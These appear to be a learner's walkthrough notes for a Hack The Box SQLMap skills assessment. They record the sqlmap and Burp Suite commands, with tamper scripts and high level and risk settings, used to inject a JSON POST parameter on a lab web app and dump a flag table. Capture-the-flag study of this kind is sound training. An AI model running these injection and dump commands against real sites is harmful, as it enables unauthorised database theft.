SQLMAP

OBJECTIVE: Perform an assessment on a web application with basic protection mechanisms.

What's the contents of table final_flag?
#navigate the website manually to find potential attack vectors
root@oco:~$ BROWSER > 94.237.51.155:48261
 * potential attack vectors w/ user input fields
    - http://94.237.51.155:48261/checkout.html
    - http://94.237.51.155:48261/blog.html
    - http://94.237.51.155:48261/blog-single.html
       - comments area
    - http://94.237.51.155:48261/contact.html

#automate identification of potential attack vectors
root@oco:~$ sqlmap -u "94.237.51.155:48261" --crawl=2 --forms --dump --batch --random-agent --thread=10
 * nothing found

#perform manual inspection
#discovered post request & json formatted request
#http://94.237.51.155:48261/shop.html

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Add Product to Cart
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - POST /action.php HTTP/1.1
      Host: 94.237.51.155:48261
      {"id":1}
       - this is a JSON/XML formatted request

#perform a basic SQLi vulnerability identification on the identified potential attack vector
#this will identify which SQLi method to use
root@oco:~$ sqlmap -r request.txt --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * if nothing is found, then perform a thorough and intrusive SQLi vulnerability identification on the identified potential attack vector
 * ALT: root@oco:~$ sqlmap -r request.txt --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment --level=5 --risk=3
    
#perform enumeration
root@oco:~$ sqlmap -r request.txt --banner --current-user --current-db --is-dba --dump --no-cast
 * do not use --batch as you're only after the specified information; doing so will run an extensive enumeration
    - JSON data found in POST body. Do you want to process it? [Y/n/q] Y
    - it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    - for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
    - (custom) POST parameter 'JSON id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    - do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y

root@oco:~$ cat /home/htb-ac-53539/.local/share/sqlmap/output/94.237.51.155/log

#identify the current DB
root@oco:~$ sqlmap -r request.txt --current-db --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * production

#identify the tables in the current DB
root@oco:~$ sqlmap -r request.txt -D production --tables --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * +-------------+
   | brands      |
   | categories  |
   | final_flag  |
   | order_items |
   | products    |
   +-------------+

#identify columns
root@oco:~$ sqlmap -r request.txt -D production -T final_flag --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
 * HTB{n07_50_h4rd_r16h7?!}
 
#extract info on specific columns
root@oco:~$ sqlmap -r request.txt -D {dataBase} -T {table} -C {columnName1,columnName2} --dump --batch --random-agent --thread=10 --no-cast --tamper=between,space2comment
